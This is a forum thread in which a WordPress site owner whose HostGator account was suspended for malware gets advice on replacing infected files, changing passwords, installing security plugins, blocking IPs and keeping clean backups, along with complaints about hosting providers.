Host gator disabled my site for malware

by bsurb
40 replies
So apparently one of my sites contained malware in the content and host gator says I'm responsible for removing it myself before they can enable my sites...

I notice they sent me an email with the malware and its in the public html, wp-includes, and a theme that I don't use..

How do you go about removing the affected content so they can restore everything back?
#disabled #gator #host #malware #site
  • If a virus is only in files ... so the quickest solution is to make a copy of the database and then install Wordpress again.

    Best Regards,
    Arthur
    {{ DiscussionBoard.errors[10347321].message }}
  • Profile picture of the author csine
    You could also try installing a malware checking plugin like wordfence or succuri security, and run a scan.
    {{ DiscussionBoard.errors[10347337].message }}
    • Profile picture of the author professorrosado
      Quickly go to cPanel - files manager and find the theme folder and delete it.
      Send the notice to HG and request the site be brought back in order to continue to scan the site for other malware.
      Install Malware Scanner "GotMLS" - very good plugin with personal support from its developer.

      Activate it and go to the scanning page. Remove ALL the file extensions in the "Skip these file extensions" box and then run a full scan.

      This will tell you if you have any Malware left in your file side and will quarantine them - simply delete these files.

      Then run an update on your site - make sure all plugins are up to date, remove all unused themes, change your cPanel password (maybe do that first thing in fact).
      Change all FTP passwords (sometimes done with your cPanel paswword change) - make sure), change ALL email passwords on your account.

      Now install Wordfence, check users for new registrations, check Wordfence for brute force attacks - keep monitoring.

      The moment a new malware is spotted on that site - scrap it - the database is infected and will certainly spread to any other sites that share your cPanel. Hope you have a distant but good back up.
      {{ DiscussionBoard.errors[10347499].message }}
  • Profile picture of the author bsurb
    Here is what host gator emailed me:

    The theme it shows looks like the themes that come with the site anyways. So I don't even use those. I can just delete the folders with the exact locations in the picture?

    Signature
    Vinyl Signs & Web Design in Ocala, FL.
    {{ DiscussionBoard.errors[10347509].message }}
    • Profile picture of the author professorrosado
      The first few are not theme files, they are WP includes files - if the other site is sharing your cPanel, either your cPanel password was compromised or your database was. by the looks of the files, I would assume at this point that your database is infected.

      Do you have good back ups (that means well before you got hacked)?

      Can you live with the back up as your new starting point? Prepare yourself for this best of two scenarios (the other being starting all over from scratch).

      I would do all the things I suggested above, but you will need to get a fresh copy of WP and download the files to your computer (then I would FTP into your account and find each file indicated by HG and overwrite with your fresh clean WP file.

      I would delete anything that is a plugin file period - you can always get a new plugin later.

      Explain in detail to HG how you resolved each instance of malware and that you want to get into the site in order to update all plugins and WP itself. Also, you will install new Malware scanning and Wordfence plugin and perform scans immediately.

      Have them monitor the site as well and if Malware pops up again - your database is compromised. Burn and rebuild.
      {{ DiscussionBoard.errors[10347552].message }}
  • Profile picture of the author bsurb
    Or I can at least save the articles into note pad and then re start that way I can of the articles back in.

    So if I make a backup of the database and I make a backup of the zip file of my Wordpress files through file manager, when I re install Wordpress and upload the zip file of Wordpress and import the database, the same corrupted files shown in the pic are going to be there though??

    How do I get those out that are in the pic.

    Deleting the current theme wouldn't do any good as the malware doesn't appear to be in it.. Host gator worn Bing it back up unless I fix it they said.
    Signature
    Vinyl Signs & Web Design in Ocala, FL.
    {{ DiscussionBoard.errors[10347562].message }}
    • Profile picture of the author professorrosado
      There is a plugin or Wp has a built in export feature that allows you to export the articles into an xml file which you can then import into your new blog.

      EDITED: Yes, it's built into Wordpress - look for the export feature in Admin Dashboard navigation under > Tools
      {{ DiscussionBoard.errors[10347616].message }}
    • Profile picture of the author professorrosado
      Originally Posted by bsurb View Post

      ....So if I make a backup of the database and I make a backup of the zip file of my Wordpress files through file manager, when I re install Wordpress and upload the zip file of Wordpress and import the database, the same corrupted files shown in the pic are going to be there though??

      How do I get those out that are in the pic.

      Deleting the current theme wouldn't do any good as the malware doesn't appear to be in it.. Host gator worn Bing it back up unless I fix it they said.
      I explained in my first post that you need to download a NEW WP file directory. You have to download WP from the depository - a direct download to your computer. Extract the files and now you have all the WP files on your computer (place in easy to remember folder)

      Then go to your cPanel through FTP client like filezilla and select each indicated file (infected) and navigate through filezilla to your WP folder on your computer and replace the infected files by uploading (overwriting) the new version over the old infected one.

      Backing up now isn't a good idea - you're only backing up an infected site and database.

      You should have had a few backups since you began your site until now. If you can export your articles, then don't worry about old backups as you do not know when you were infected.

      https://wordpress.org/download/
      {{ DiscussionBoard.errors[10347624].message }}
  • Profile picture of the author littleseizure
    I've been on more hosting companies than I can reliably count. Recently I registered a domain - one domain - with HG, and they've been such a pain that I'm considering rescinding the purchase and going with one of the other companies I've been using forever. Just sayin'...
    Signature
    Mongol General: Wrong! Conan! What is best in life?
    Conan: Crush your enemies, see them driven before you, and hear the lamentation of their women....
    {{ DiscussionBoard.errors[10347869].message }}
  • Profile picture of the author csine
    With so many files infected in base folder, your cpanel password is definitely compromised.
    {{ DiscussionBoard.errors[10348130].message }}
  • Profile picture of the author jackiedesign
    Contact with hostgator support and let them know the truth. Hope you will help you to get it back. I think it will be best to contact with them, they can unban it.
    {{ DiscussionBoard.errors[10348169].message }}
  • Profile picture of the author tuhinindia1971
    It is better to knock to the dispatch of the Hostgator. We all know the hostgator is one of the leading service provider in this section. So I am sure the helpdesk will support you fully. Thanks a lot.
    {{ DiscussionBoard.errors[10348301].message }}
  • Profile picture of the author bsurb
    I just got the malware removed off a blog of mine, I cleaned up my cpanel with old site files I no longer use.

    From experience or knowledge, does anybody know the best Plugins to use for security? I don't mind spending a few bucks on a premium plugin on theme forest of it helps..

    Changing cpanel and Wordpress password to something hard. Keeping plugins and theme up to date. What else should you be monitoring daily?

    What kind of hosting would you recommend if you own several sites? Right now I'm on host gators shared.
    Signature
    Vinyl Signs & Web Design in Ocala, FL.
    {{ DiscussionBoard.errors[10348681].message }}
    • Profile picture of the author professorrosado
      Originally Posted by bsurb View Post

      I just got the malware removed off a blog of mine, I cleaned up my cpanel with old site files I no longer use.

      From experience or knowledge, does anybody know the best Plugins to use for security? I don't mind spending a few bucks on a premium plugin on theme forest of it helps..

      Changing cpanel and Wordpress password to something hard. Keeping plugins and theme up to date. What else should you be monitoring daily?

      What kind of hosting would you recommend if you own several sites? Right now I'm on host gators shared.
      Wordfence
      WP Security

      Bullet Proof Security is very strong, however, I've found it troublesome for some types of sites / themes.

      Monitor live traffic, note repeated ips and countries trying to access login.php - if you can, lock your login page and rename.
      Also whitelist your own IP for WP access (back end).
      Ask your host to restrict access to CPanel only to your IP. If they say they can't, move to another host.

      The main focus for you is to restrict access, block registrations, block countries with heavy hacker activity - Russia and China right off the bat. Use IQ block country plugin for this.

      Daily monitor live traffic on each site, immediately delete registrations that have wierd emails and from China or Russia, etc.

      Change CPanel and ALL passwords and WP passwords on a regular periodic basis.

      Make regular backups after malware scans and develop a backup storage plan so that you know that the you always have a clean and viable backup to fall back on.

      Hackers use software to attack your sites so you need diligent and relentless monitoring of your websites and cPanel while making sure you can destroy your database and site at anytime and be back up and running within minutes. This is the minimum state you need to maintain if you wish to avoid hacker induced business interruption or at least keep it manageable and limited.
      {{ DiscussionBoard.errors[10349165].message }}
      • Profile picture of the author bsurb
        How about securi security? I have that plugin installed now right after I had the malware removed.
        Signature
        Vinyl Signs & Web Design in Ocala, FL.
        {{ DiscussionBoard.errors[10349285].message }}
        • Profile picture of the author professorrosado
          I find that I can do most of what securi does (premium) my self.

          I usually do not find a need to pay for most of the services I need. I do a little research and learn how to do things my self.

          One example is Wordfence has a country blocker but they want you to go premium to get it. I just look for another plugin that does the country blocking for free.

          If a free functionality is available then I say go free.

          There is also a cPanel database changes / malware scanner too. The developer (only one) wants their fee for that too! But with the scanner type plugins cited and others available that monitor file changes, it is more than you should expect really. But none of these can prevent your site or database from getting hacked - so why spend the hundreds?

          Your best protection is a great back up strategy.
          {{ DiscussionBoard.errors[10349636].message }}
          • Profile picture of the author bsurb
            Thanks for the help. I have securi installed and I haven't paid anything. Every time somebody tries to make an attempt to log into my blog or does log in, it sends me an email.

            Just last night I woke up and got an email that someone had two failed login attempts on my site. It also tells me what username they tried using.

            To scan for malware do you recommend WP security?

            How about a plugin for your daily backups? I found a plugin called blog vault. It keeps daily backups of your blog including your database but that is like $9 per month with a week free trial.

            But basically you run a malware scan with a plugin, if it detects no malware, proceed with a backup so you have a clean copy. How often do you backup?
            Signature
            Vinyl Signs & Web Design in Ocala, FL.
            {{ DiscussionBoard.errors[10350343].message }}
            • Profile picture of the author professorrosado
              Originally Posted by bsurb View Post

              Thanks for the help. I have securi installed and I haven't paid anything. Every time somebody tries to make an attempt to log into my blog or does log in, it sends me an email.

              Just last night I woke up and got an email that someone had two failed login attempts on my site. It also tells me what username they tried using.

              To scan for malware do you recommend WP security?

              How about a plugin for your daily backups? I found a plugin called blog vault. It keeps daily backups of your blog including your database but that is like $9 per month with a week free trial.

              But basically you run a malware scan with a plugin, if it detects no malware, proceed with a backup so you have a clean copy. How often do you backup?
              Use both Wordfence & GOTMLS.

              cPanel should have a backup scheduler. Did you install the site using Softaculous or other installer? They usually have a backup utility.

              The number of backups and frequency depend on your type of site. If it is just an information blog, then schedule backups according to your sense of comfort and the level of hacker (login attempts) occurring on your site. If your site is an active member site, with many logins and user interactions / contributions everyday from members and new registrations, etc., you'll need a daily backup to ensure you can recover with minimal loss of member activity as possible.

              You'll need to have a system for rotating off your host periodic good backups for your offline storage - for example, just before the schedule trashes the oldest backup to make room for a new backup, remove the old one by downloading it to your own storage hard drive. Develop your own method of keeping viable backups at your location so you can free up your acct. space.

              Can't speak for securi, although many testify to its power, I tried it and it did not impress me (without my money). I do a lot more with multiple free plugins.

              I am not against people earning a living from their work, but it gets ridiculous to have to pay here and there and everywhere for every little bell and whistle. I wouldn't pay for any functionality that I can find elsewhere for free and plugin developers should not charge for functionality available for free either - put on your thinking caps and free up the free. Buyer beware!

              Also, never panic and remember the export function of WP before you kill an infected install.
              {{ DiscussionBoard.errors[10350367].message }}
  • Profile picture of the author seobro
    That is why I personally dislike using word press. Hackers are drawn to it like flies to horse manure. HTML is much more secure. Please learn your lesson as I did years ago. Also, if you ever do get some traffic, it will eat up a lot of resources. HG will ban you for sure. Remember that MYSQL databases are a resource pig. That is why word press web sites load like watching grass grow.
    {{ DiscussionBoard.errors[10350879].message }}
    • Profile picture of the author bsurb
      I've had 4 attempted failed logins today.

      Does joomla have any more benefits security wise rather than WP??

      Wordpress seems so very easy to get into.
      Signature
      Vinyl Signs & Web Design in Ocala, FL.
      {{ DiscussionBoard.errors[10351432].message }}
  • Profile picture of the author sweetcrabhoney18
    Same thing happened to me two weeks ago with Site5. The company was such a jerk about it I just closed the account , moved my sites to liquidweb because they fixed the issue for me and had my site up in only a few hours. Compared to site5 having my site down for 4 days .

    It takes time to edit the files ... ask if they have a service to help you with it. And only focus on only one domain at a time if it has more than one on it.
    Signature

    keep moving forward

    {{ DiscussionBoard.errors[10351460].message }}
  • Profile picture of the author 0xFF
    If a web hosting company asked me such a thing with this tone, I'll go away toward a competitor without delay. It's their job to clean-up your space or, at least, to help you to do it (eg. telling you what to enable/install and run through your cpanel).
    {{ DiscussionBoard.errors[10351476].message }}
  • Profile picture of the author bsurb
    So what do you suggest? Keep my eyes out daily and keep making backups? It just seems like way too much work to handle one site?...
    Signature
    Vinyl Signs & Web Design in Ocala, FL.
    {{ DiscussionBoard.errors[10351480].message }}
  • Profile picture of the author onegoodman
    What I hate about hostgator, they take you down first, then they talk to you, they have a golden rule Customer comes last
    {{ DiscussionBoard.errors[10351557].message }}
    • Profile picture of the author professorrosado
      Originally Posted by onegoodman View Post

      What I hate about hostgator, they take you down first, then they talk to you, they have a golden rule Customer comes last
      They are not the only ones - it is common procedure. Obviously, it takes a while for your site to become so compromised. Why keep it up any longer - you obviously are not monitoring the site? It gets your attention though, doesn't it?
      {{ DiscussionBoard.errors[10351604].message }}
      • Profile picture of the author onegoodman
        Originally Posted by professorrosado View Post

        They are not the only ones - it is common procedure. Obviously, it takes a while for your site to become so compromised. Why keep it up any longer - you obviously are not monitoring the site? It gets your attention though, doesn't it?
        The first step should be try helping me as a customer to stay in business, an alert, a notification, or even a call if this actually urgent, not an email telling me that they screwed my business by suspending my account, what do i tell my customer for my website being offline 3 days after i solve the problem in less than an hour (even a malware is easy to fix, but how long would it take hostgator support to re-instate that account ), sure, there are many crappy company like hostgator that do the same ( probably owned by the same parent company of hostgator ) but there are also company that would be respectful enough to notify me in advance.
        {{ DiscussionBoard.errors[10351718].message }}
        • Profile picture of the author bsurb
          I got two more failed login attempts this morning. They are all the same IP. do I talk to host gator about blocking an IP address or can I do that on my end?
          Signature
          Vinyl Signs & Web Design in Ocala, FL.
          {{ DiscussionBoard.errors[10351870].message }}
          • Profile picture of the author professorrosado
            Originally Posted by bsurb View Post

            I got two more failed login attempts this morning. They are all the same IP. do I talk to host gator about blocking an IP address or can I do that on my end?
            Why aren't you using wordfence?
            Why haven't you installed All in One WP Security plugin?
            BulletProof Security Plugin?

            All of these free plugins would block this automatically with tweaking as I have suggested.

            One IP is good news! I had to deal with hundreds at a time!

            Also, did you install GOTMLS? Remember to remove all the extensions in the skip files section so that it can scan everything in your domain! This plugin is the absolute best malware detector out there - I've tried everything and this plugin and developer is spot on the best!
            {{ DiscussionBoard.errors[10352457].message }}
            • Profile picture of the author bsurb
              Originally Posted by professorrosado View Post

              Why aren't you using wordfence?
              Why haven't you installed All in One WP Security plugin?
              BulletProof Security Plugin?

              All of these free plugins would block this automatically with tweaking as I have suggested.

              One IP is good news! I had to deal with hundreds at a time!

              Also, did you install GOTMLS? Remember to remove all the extensions in the skip files section so that it can scan everything in your domain! This plugin is the absolute best malware detector out there - I've tried everything and this plugin and developer is spot on the best!
              I just installed All in one WP security and Firewall plugin andWordfence plugin...

              Since I have those installed, should I delete securi plugin? Or can I have all of these installed at the same time?

              The securi sends me emails every time I log in or someone is trying to log into my admin area.

              The bullet proof plugin can I have that installed as well? Seems like a lot of different plugins... Is that safe?

              I also have this installed currently. It seems like a pretty decent one.. https://wordpress.org/plugins/gotmls/

              What should I stick to?
              Signature
              Vinyl Signs & Web Design in Ocala, FL.
              {{ DiscussionBoard.errors[10354469].message }}
              • Profile picture of the author professorrosado
                Seems like a lot of different plugins... Is that safe?

                I also have this installed currently. It seems like a pretty decent one.. https://wordpress.org/plugins/gotmls/

                What should I stick to?
                They each do similar and dissimilar functions. GOTMLS is a malware scanner and the others don't do what this can well. Wordfence scans files but nothing like GOTMLS.

                Yes, unless you see problems on your site, you can have all of them running. The issue is which ones do what and do you really need two that do the exact same things.

                Your question shouldn't be should I have one or the other, rather, you should add as many protective functioning on your site as possible.

                Just an hour ago I added yet another plugin because it specifically mentioned blocking xlmrc exploit hacking and I was noticing traffic calling on that file in particular.

                Hackers are non stop relentless exploiters and you need to be just as much a relentless defender!
                {{ DiscussionBoard.errors[10355091].message }}
              • Profile picture of the author zotohost
                Just a small recommendation. If you have issue with WordPress & your not sure how to fix it / secure it then it's better for you to go for managed WordPress hosting. Sure you have to pay a bit more but you can leave all the worries about WordPress to them & focus on your core activity.

                Please don't use multiple plugins for security. This will further complicate the issue. use only one plugin.

                Originally Posted by bsurb View Post

                I just installed All in one WP security and Firewall plugin andWordfence plugin...

                Since I have those installed, should I delete securi plugin? Or can I have all of these installed at the same time?

                The securi sends me emails every time I log in or someone is trying to log into my admin area.

                The bullet proof plugin can I have that installed as well? Seems like a lot of different plugins... Is that safe?

                I also have this installed currently. It seems like a pretty decent one.. https://wordpress.org/plugins/gotmls/

                What should I stick to?
                {{ DiscussionBoard.errors[10355886].message }}
        • Profile picture of the author professorrosado
          Originally Posted by onegoodman View Post

          The first step should be try helping me as a customer to stay in business, an alert, a notification, or even a call if this actually urgent, not an email telling me that they screwed my business by suspending my account, what do i tell my customer for my website being offline 3 days after i solve the problem in less than an hour (even a malware is easy to fix, but how long would it take hostgator support to re-instate that account ), sure, there are many crappy company like hostgator that do the same ( probably owned by the same parent company of hostgator ) but there are also company that would be respectful enough to notify me in advance.
          Well, you see onegoodman, this company did look out for "your" business as it shut down an infested neighbor of yours who would have caused your business to get hacked, or your shared server from being bombarded and who knows what else, if they didn't shut him down immediately!

          So I'm glad you can appreciate that professional and responsible action.
          {{ DiscussionBoard.errors[10352472].message }}
          • Profile picture of the author professorrosado
            FYI Post:

            HOST:
            What I have had hosts do for me in the past is the following:
            I provide them with a list of IPs to Blacklist from my entire account.
            I have also Whitelisted my own IP for my entire account - especially cPanel access.

            You need to have static IP for this.

            WP Plugins:
            Wordfence live traffic monitor - non-existent page tab lists anybody trying to access plugins and back end directly and allows you to block their IP. Do this survey every day at least once a day depending on traffic volume and you should be good - if you're getting attacked, then you'll need to be more aggressive too!

            Bullet Proof Security is very powerful but it is a little bit harder to use effectively on your site and in some cases (themes/plugins) causes an issue with your site - but it is definitely well worth your time in trying and tweaking for your site.

            All In One WP Security - Lots of neat features that are usually premium in other plugins.

            IQ Country Block: Sorry Russia and China! Done! This plugin also can restrict dashboard access to your static IP (whitelists it) and you can limit access to your own country to further reduce access.

            So you see with this last plugin in place, the other plugins and their IP blocking functions, and your Hosting company's IP Blocking (they can also do the country blocks for you too) you'll have three levels of IP blocking and restricted access barriers which should keep off most of the "amateurs" and hacking students out there which cause most of the problems for WP users.

            Also share information about hacking attempts, IP addresses and registrant emails used by them to gain access to your sites so that others can quickly put up defenses for their sites.

            This is why I took the time to post here in this thread so that others can build up more defenses for their sites as a service to the WP community and fellow Warriors. I am sure we all will appreciate any contributions that any of you may add to our Wordpress defense skillset as a way to fight back!
            {{ DiscussionBoard.errors[10352755].message }}
  • Profile picture of the author maxsi
    Talk to Hostgator and explain the problem, they must believe in their customers. Explain your case is the best way to resolve the problem

    Otherwise you can change your hosting
    {{ DiscussionBoard.errors[10351921].message }}
  • Profile picture of the author Kingfish85
    Originally Posted by 0xFF View Post

    If a web hosting company asked me such a thing with this tone, I'll go away toward a competitor without delay. It's their job to clean-up your space or, at least, to help you to do it (eg. telling you what to enable/install and run through your cpanel).
    this absolutely incorrect, with ANY hosting provider. As the website owner, it's your responsibility to maintain the website, not the hosts. If the host ended up making sure sites were updated and not using junk, exploited themes/plugins, half of the sites would be broken.

    These are typical WordPress exploits. The best thing you can do is remove everything and start with fresh copies of everything on the account.This is one of the drawbacks of using "addon domains", once a site gets compromised, everything on the hosting account does.

    Unfortunately, while HostGator doesn't have the best reputation anymore, there's nothing wrong with what they did. It's not their responsibility to make sure the websites are properly secured.
    {{ DiscussionBoard.errors[10352117].message }}
  • Profile picture of the author Rich Struck
    This is why WordPress is so awesome.
    Signature

    {{ DiscussionBoard.errors[10354924].message }}
  • Profile picture of the author Sagar Mehta
    I've had this issue on my WP sites too, all hosted on Hostgator.

    One thing I've noticed is that the affected sites were all installed using Softalacious - any sites I installed manually don't have any of that malware.

    It ultimately ended up with Firefox and Chrome refusing to open any of my sites without that red warning.

    You may need someone who knows their way around this stuff to help you out and fix stuff. I found switching my account to new hosting and exporting only the blogs I needed much easier. I had to organize my server anyway, and wanted to move away anyway.
    Signature
    Need AWESOME Customer Support For Your Product / Service / Upcoming Launches? > Click Here <
    {{ DiscussionBoard.errors[10355911].message }}
  • Profile picture of the author Khovai
    Lol, please do not delete your entire theme folder or re-install WordPress as some people are suggesting. Look for a plugin called ELI Anti-Malware.

    That plugin alone will scan your entire website and will notify you in most cases of any malware or backdoors on your server.

    Also, change your password before logging in again. Most of the hacks I dealt with were just people who spammed pharma links or hid pharma links via styling in people's pages.

    Change your password to something secure: I use Strong Random Password Generator
    Then run GOTLS which you've already been recommended and fix the red hot issues that it recommends.

    This is why I also tell people not to buy those crappy Themeforest themes because they come loaded with plugins that authors abandon or fail to update. Also, remember to keep ALL of your plugins up to date at all times. It's so easy to target a website via outdated plugins and gain access to it without even getting a password.

    I stress this all the time yet clients never do it.
    Signature
    Offering Writing/Content Services (And Not For Cheap)
    Just 1 quality article is far better than 20 cheap $5 articles
    {{ DiscussionBoard.errors[10355943].message }}

Trending Topics